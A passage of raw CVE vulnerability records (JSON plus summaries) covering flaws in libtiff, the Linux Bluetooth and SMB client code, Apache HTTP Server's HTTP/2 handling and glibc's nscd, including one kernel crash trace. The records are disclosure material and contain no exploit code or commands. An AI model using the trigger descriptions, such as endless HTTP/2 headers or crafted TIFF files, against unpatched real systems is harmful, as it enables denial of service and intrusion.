"name": "RHBZ#2191691", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2191691" } ], "timeline": [ { "lang": "en", "time": "2023-04-26T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-04-26T00:00:00+00:00", "value": "Made public." } ], "title": "Reachable assertion in dbus_set_host_name", "x_redhatCweChain": "CWE-617: Reachable Assertion" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-38471", "datePublished": "2023-11-02T14:58:22.628Z", "dateReserved": "2023-07-18T09:48:04.753Z", "dateUpdated": "2024-08-29T14:17:30.825Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-3618
Vulnerability from cvelistv5
Published
2023-07-12 14:06
Modified
2024-09-26 19:26
Severity ?
EPSS score ?
Summary
A flaw was found in libtiff. A specially crafted tiff file can lead to a segmentation fault due to a buffer overflow in the Fax3Encode function in libtiff/tif_fax3.c, resulting in a denial of service.
References
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | n/a | libtiff | |||||||||||||||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T07:01:56.851Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-3618" }, { "name": "RHBZ#2215865", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2215865" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00034.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230824-0012/" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT214038" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT214036" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT214037" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-3618", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-09-26T19:26:00.978317Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-09-26T19:26:31.776Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "affected", "product": "libtiff", "vendor": "n/a" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "libtiff", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "compat-libtiff3", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "libtiff", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "compat-libtiff3", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "libtiff", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "libtiff", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://packages.fedoraproject.org/", "defaultStatus": "affected", "packageName": "iv", "product": "Fedora", "vendor": "Fedora" }, { "collectionURL": "https://packages.fedoraproject.org/", "defaultStatus": "affected", "packageName": "libtiff", "product": "Fedora", "vendor": "Fedora" }, { "collectionURL": "https://packages.fedoraproject.org/", "defaultStatus": "affected", "packageName": "mingw-libtiff", "product": "Fedora", "vendor": "Fedora" }, { "collectionURL": "https://packages.fedoraproject.org/", "defaultStatus": "unaffected", "packageName": "tkimg", "product": "Fedora", "vendor": "Fedora" } ], "datePublic": "2023-02-13T00:00:00Z", "descriptions": [ { "lang": "en", "value": "A flaw was found in libtiff. A specially crafted tiff file can lead to a segmentation fault due to a buffer overflow in the Fax3Encode function in libtiff/tif_fax3.c, resulting in a denial of service." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-120", "description": "Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-07-15T00:27:54.327174Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-3618" }, { "name": "RHBZ#2215865", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2215865" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00034.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230824-0012/" }, { "url": "https://support.apple.com/kb/HT214038" }, { "url": "https://support.apple.com/kb/HT214036" }, { "url": "https://support.apple.com/kb/HT214037" } ], "timeline": [ { "lang": "en", "time": "2023-06-19T00:00:00Z", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-02-13T00:00:00Z", "value": "Made public." } ], "title": "Segmentation fault in fax3encode in libtiff/tif_fax3.c", "x_redhatCweChain": "CWE-120: Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-3618", "datePublished": "2023-07-12T14:06:04.572Z", "dateReserved": "2023-07-11T14:46:05.545Z", "dateUpdated": "2024-09-26T19:26:31.776Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-28866
Vulnerability from cvelistv5
Published
2023-03-27 00:00
Modified
2024-08-02 13:51
Severity ?
EPSS score ?
Summary
In the Linux kernel through 6.2.8, net/bluetooth/hci_sync.c allows out-of-bounds access because amp_init1[] and amp_init2[] are supposed to have an intentionally invalid element, but do not.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T13:51:38.321Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://patchwork.kernel.org/project/bluetooth/patch/20230322232543.3079578-1-luiz.dentz%40gmail.com" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/lkml/20230321015018.1759683-1-iam%40sung-woo.kim/" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=95084403f8c070ccf5d7cbe72352519c1798a40a" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel through 6.2.8, net/bluetooth/hci_sync.c allows out-of-bounds access because amp_init1[] and amp_init2[] are supposed to have an intentionally invalid element, but do not." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-03-27T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://patchwork.kernel.org/project/bluetooth/patch/20230322232543.3079578-1-luiz.dentz%40gmail.com" }, { "url": "https://lore.kernel.org/lkml/20230321015018.1759683-1-iam%40sung-woo.kim/" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=95084403f8c070ccf5d7cbe72352519c1798a40a" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-28866", "datePublished": "2023-03-27T00:00:00", "dateReserved": "2023-03-27T00:00:00", "dateUpdated": "2024-08-02T13:51:38.321Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-52434
Vulnerability from cvelistv5
Published
2024-02-20 18:04
Modified
2024-12-19 08:19
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix potential OOBs in smb2_parse_contexts()
Validate offsets and lengths before dereferencing create contexts in
smb2_parse_contexts().
This fixes following oops when accessing invalid create contexts from
server:
BUG: unable to handle page fault for address: ffff8881178d8cc3
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 4a01067 P4D 4a01067 PUD 0
Oops: 0000 [#1] PREEMPT SMP NOPTI
CPU: 3 PID: 1736 Comm: mount.cifs Not tainted 6.7.0-rc4 #1
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS
rel-1.16.2-3-gd478f380-rebuilt.opensuse.org 04/01/2014
RIP: 0010:smb2_parse_contexts+0xa0/0x3a0 [cifs]
Code: f8 10 75 13 48 b8 93 ad 25 50 9c b4 11 e7 49 39 06 0f 84 d2 00
00 00 8b 45 00 85 c0 74 61 41 29 c5 48 01 c5 41 83 fd 0f 76 55 <0f> b7
7d 04 0f b7 45 06 4c 8d 74 3d 00 66 83 f8 04 75 bc ba 04 00
RSP: 0018:ffffc900007939e0 EFLAGS: 00010216
RAX: ffffc90000793c78 RBX: ffff8880180cc000 RCX: ffffc90000793c90
RDX: ffffc90000793cc0 RSI: ffff8880178d8cc0 RDI: ffff8880180cc000
RBP: ffff8881178d8cbf R08: ffffc90000793c22 R09: 0000000000000000
R10: ffff8880180cc000 R11: 0000000000000024 R12: 0000000000000000
R13: 0000000000000020 R14: 0000000000000000 R15: ffffc90000793c22
FS: 00007f873753cbc0(0000) GS:ffff88806bc00000(0000)
knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ffff8881178d8cc3 CR3: 00000000181ca000 CR4: 0000000000750ef0
PKRU: 55555554
Call Trace:
<TASK>
? __die+0x23/0x70
? page_fault_oops+0x181/0x480
? search_module_extables+0x19/0x60
? srso_alias_return_thunk+0x5/0xfbef5
? exc_page_fault+0x1b6/0x1c0
? asm_exc_page_fault+0x26/0x30
? smb2_parse_contexts+0xa0/0x3a0 [cifs]
SMB2_open+0x38d/0x5f0 [cifs]
? smb2_is_path_accessible+0x138/0x260 [cifs]
smb2_is_path_accessible+0x138/0x260 [cifs]
cifs_is_path_remote+0x8d/0x230 [cifs]
cifs_mount+0x7e/0x350 [cifs]
cifs_smb3_do_mount+0x128/0x780 [cifs]
smb3_get_tree+0xd9/0x290 [cifs]
vfs_get_tree+0x2c/0x100
? capable+0x37/0x70
path_mount+0x2d7/0xb80
? srso_alias_return_thunk+0x5/0xfbef5
? _raw_spin_unlock_irqrestore+0x44/0x60
__x64_sys_mount+0x11a/0x150
do_syscall_64+0x47/0xf0
entry_SYSCALL_64_after_hwframe+0x6f/0x77
RIP: 0033:0x7f8737657b1e
References
Impacted products
Vendor | Product | Version | |||||
---|---|---|---|---|---|---|---|
▼ | Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||||
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-52434", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-02-20T19:31:41.798943Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-07-05T17:21:08.159Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T22:55:41.782Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/6726429c18c62dbf5e96ebbd522f262e016553fb" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/13fb0fc4917621f3dfa285a27eaf7151d770b5e5" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/890bc4fac3c0973a49cac35f634579bebba7fe48" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/1ae3c59355dc9882e09c020afe8ffbd895ad0f29" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/17a0f64cc02d4972e21c733d9f21d1c512963afa" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/af1689a9b7701d9907dfc84d2a4b57c4bc907144" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "fs/smb/client/cached_dir.c", "fs/smb/client/smb2pdu.c", "fs/smb/client/smb2proto.h" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "6726429c18c62dbf5e96ebbd522f262e016553fb", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" }, { "lessThan": "13fb0fc4917621f3dfa285a27eaf7151d770b5e5", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" }, { "lessThan": "890bc4fac3c0973a49cac35f634579bebba7fe48", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" }, { "lessThan": "1ae3c59355dc9882e09c020afe8ffbd895ad0f29", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" }, { "lessThan": "17a0f64cc02d4972e21c733d9f21d1c512963afa", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" }, { "lessThan": "af1689a9b7701d9907dfc84d2a4b57c4bc907144", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "fs/smb/client/cached_dir.c", "fs/smb/client/smb2pdu.c", "fs/smb/client/smb2proto.h" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThanOrEqual": "5.4.*", "status": "unaffected", "version": "5.4.277", "versionType": "semver" }, { "lessThanOrEqual": "5.10.*", "status": "unaffected", "version": "5.10.211", "versionType": "semver" }, { "lessThanOrEqual": "5.15.*", "status": "unaffected", "version": "5.15.150", "versionType": "semver" }, { "lessThanOrEqual": "6.1.*", "status": "unaffected", "version": "6.1.79", "versionType": "semver" }, { "lessThanOrEqual": "6.6.*", "status": "unaffected", "version": "6.6.8", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.7", "versionType": "original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix potential OOBs in smb2_parse_contexts()\n\nValidate offsets and lengths before dereferencing create contexts in\nsmb2_parse_contexts().\n\nThis fixes following oops when accessing invalid create contexts from\nserver:\n\n BUG: unable to handle page fault for address: ffff8881178d8cc3\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 4a01067 P4D 4a01067 PUD 0\n Oops: 0000 [#1] PREEMPT SMP NOPTI\n CPU: 3 PID: 1736 Comm: mount.cifs Not tainted 6.7.0-rc4 #1\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS\n rel-1.16.2-3-gd478f380-rebuilt.opensuse.org 04/01/2014\n RIP: 0010:smb2_parse_contexts+0xa0/0x3a0 [cifs]\n Code: f8 10 75 13 48 b8 93 ad 25 50 9c b4 11 e7 49 39 06 0f 84 d2 00\n 00 00 8b 45 00 85 c0 74 61 41 29 c5 48 01 c5 41 83 fd 0f 76 55 \u003c0f\u003e b7\n 7d 04 0f b7 45 06 4c 8d 74 3d 00 66 83 f8 04 75 bc ba 04 00\n RSP: 0018:ffffc900007939e0 EFLAGS: 00010216\n RAX: ffffc90000793c78 RBX: ffff8880180cc000 RCX: ffffc90000793c90\n RDX: ffffc90000793cc0 RSI: ffff8880178d8cc0 RDI: ffff8880180cc000\n RBP: ffff8881178d8cbf R08: ffffc90000793c22 R09: 0000000000000000\n R10: ffff8880180cc000 R11: 0000000000000024 R12: 0000000000000000\n R13: 0000000000000020 R14: 0000000000000000 R15: ffffc90000793c22\n FS: 00007f873753cbc0(0000) GS:ffff88806bc00000(0000)\n knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: ffff8881178d8cc3 CR3: 00000000181ca000 CR4: 0000000000750ef0\n PKRU: 55555554\n Call Trace:\n \u003cTASK\u003e\n ? __die+0x23/0x70\n ? page_fault_oops+0x181/0x480\n ? search_module_extables+0x19/0x60\n ? srso_alias_return_thunk+0x5/0xfbef5\n ? exc_page_fault+0x1b6/0x1c0\n ? asm_exc_page_fault+0x26/0x30\n ? smb2_parse_contexts+0xa0/0x3a0 [cifs]\n SMB2_open+0x38d/0x5f0 [cifs]\n ? smb2_is_path_accessible+0x138/0x260 [cifs]\n smb2_is_path_accessible+0x138/0x260 [cifs]\n cifs_is_path_remote+0x8d/0x230 [cifs]\n cifs_mount+0x7e/0x350 [cifs]\n cifs_smb3_do_mount+0x128/0x780 [cifs]\n smb3_get_tree+0xd9/0x290 [cifs]\n vfs_get_tree+0x2c/0x100\n ? capable+0x37/0x70\n path_mount+0x2d7/0xb80\n ? srso_alias_return_thunk+0x5/0xfbef5\n ? _raw_spin_unlock_irqrestore+0x44/0x60\n __x64_sys_mount+0x11a/0x150\n do_syscall_64+0x47/0xf0\n entry_SYSCALL_64_after_hwframe+0x6f/0x77\n RIP: 0033:0x7f8737657b1e" } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:19:26.749Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/6726429c18c62dbf5e96ebbd522f262e016553fb" }, { "url": "https://git.kernel.org/stable/c/13fb0fc4917621f3dfa285a27eaf7151d770b5e5" }, { "url": "https://git.kernel.org/stable/c/890bc4fac3c0973a49cac35f634579bebba7fe48" }, { "url": "https://git.kernel.org/stable/c/1ae3c59355dc9882e09c020afe8ffbd895ad0f29" }, { "url": "https://git.kernel.org/stable/c/17a0f64cc02d4972e21c733d9f21d1c512963afa" }, { "url": "https://git.kernel.org/stable/c/af1689a9b7701d9907dfc84d2a4b57c4bc907144" } ], "title": "smb: client: fix potential OOBs in smb2_parse_contexts()", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2023-52434", "datePublished": "2024-02-20T18:04:44.006Z", "dateReserved": "2024-02-20T12:30:33.290Z", "dateUpdated": "2024-12-19T08:19:26.749Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-27316
Vulnerability from cvelistv5
Published
2024-04-04 19:21
Modified
2024-08-02 00:34
Severity ?
EPSS score ?
Summary
HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | Apache Software Foundation | Apache HTTP Server |
Version: 2.4.17 ≤ 2.4.58 |
|
{ "containers": { "adp": [ { "affected": [ { "cpes": [ "cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "http_server", "vendor": "apache", "versions": [ { "lessThanOrEqual": "2.4.58", "status": "affected", "version": "2.4.17", "versionType": "semver" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2024-27316", "options": [ { "Exploitation": "none" }, { "Automatable": "yes" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-07-29T15:46:29.859482Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-07-29T15:50:30.340Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T00:34:51.356Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://httpd.apache.org/security/vulnerabilities_24.html" }, { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2024/04/03/16" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/04/4" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT214119" }, { "tags": [ "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2024/Jul/18" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Apache HTTP Server", "vendor": "Apache Software Foundation", "versions": [ { "lessThanOrEqual": "2.4.58", "status": "affected", "version": "2.4.17", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "type": "finder", "value": "Bartek Nowotarski (https://nowotarski.info/)" } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion." } ], "value": "HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion." } ], "metrics": [ { "other": { "content": { "text": "moderate" }, "type": "Textual description of severity" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-770", "description": "CWE-770 Allocation of Resources Without Limits or Throttling", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-07-22T08:42:14.089Z", "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09", "shortName": "apache" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://httpd.apache.org/security/vulnerabilities_24.html" }, { "url": "https://www.openwall.com/lists/oss-security/2024/04/03/16" }, { "url": "http://www.openwall.com/lists/oss-security/2024/04/04/4" }, { "url": "https://support.apple.com/kb/HT214119" }, { "url": "http://seclists.org/fulldisclosure/2024/Jul/18" } ], "source": { "discovery": "EXTERNAL" }, "timeline": [ { "lang": "en", "time": "2024-02-22T15:29:00.000Z", "value": "Reported to security team" } ], "title": "Apache HTTP Server: HTTP/2 DoS by memory exhaustion on endless continuation frames", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09", "assignerShortName": "apache", "cveId": "CVE-2024-27316", "datePublished": "2024-04-04T19:21:41.984Z", "dateReserved": "2024-02-23T14:20:56.465Z", "dateUpdated": "2024-08-02T00:34:51.356Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-33599
Vulnerability from cvelistv5
Published
2024-05-06 19:21
Modified
2024-08-02 02:36
Severity ?
EPSS score ?
Summary
nscd: Stack-based buffer overflow in netgroup cache
If the Name Service Cache Daemon's (nscd) fixed size cache is exhausted
by client requests then a subsequent client request for netgroup data
may result in a stack-based buffer overflow. This flaw was introduced
in glibc 2.15 when the cache was added to nscd.
This vulnerability is only present in the nscd binary.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | The GNU C Library | glibc |
Version: 2.15 < 2.40 |
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-33599", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-05-29T19:01:02.703174Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:45:09.077Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T02:36:04.290Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://sourceware.org/git/?p=glibc.git;a=blob;f=advisories/GLIBC-SA-2024-0005" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240524-0011/" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00026.html" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/07/22/5" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "glibc", "vendor": "The GNU C Library", "versions": [ { "lessThan": "2.40", "status": "affected", "version": "2.15", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "nscd: Stack-based buffer overflow in netgroup cache\u003cbr\u003e\u003cbr\u003eIf the Name Service Cache Daemon\u0027s (nscd) fixed size cache is exhausted\u003cbr\u003eby client requests then a subsequent client request for netgroup data\u003cbr\u003emay result in a stack-based buffer overflow. This flaw was introduced\u003cbr\u003ein glibc 2.15 when the cache was added to nscd.\u003cbr\u003e\u003cbr\u003eThis vulnerability is only present in the nscd binary.\u003cbr\u003e" } ], "value": "nscd: Stack-based buffer overflow in netgroup cache\n\nIf the Name Service Cache Daemon\u0027s (nscd) fixed size cache is exhausted\nby client requests then a subsequent client request for netgroup data\nmay result in a stack-based buffer overflow. This flaw was introduced\nin glibc 2.15 when the cache was added to nscd.\n\nThis vulnerability is only present in the nscd binary.\n" } ], "impacts": [ { "capecId": "CAPEC-100", "descriptions": [ { "lang": "en", "value": "CAPEC-100 Overflow Buffers" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-121", "description": "CWE-121 Stack-based Buffer Overflow", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-05-06T19:21:54.314Z", "orgId": "3ff69d7a-14f2-4f67-a097-88dee7810d18", "shortName": "glibc" }, "references": [ { "url": "https://sourceware.org/git/?p=glibc.git;a=blob;f=advisories/GLIBC-SA-2024-0005" }, { "url": "https://security.netapp.com/advisory/ntap-20240524-0011/" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00026.html" }, { "url": "http://www.openwall.com/lists/oss-security/2024/07/22/5" } ], "source": { "discovery": "UNKNOWN" }, "title": "nscd: Stack-based buffer overflow in netgroup cache", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "3ff69d7a-14f2-4f67-a097-88dee7810d18", "assignerShortName": "glibc", "cveId": "CVE-2024-33599", "datePublished": "2024-05-06T19:21:54.314Z", "dateReserved": "2024-04-24T20:35:08.340Z", "dateUpdated": "2024-08-02T02:36:04.290Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-28464
Vulnerability from cvelistv5
Published
2023-03-31 00:00
Modified
2024-08-02 12:38
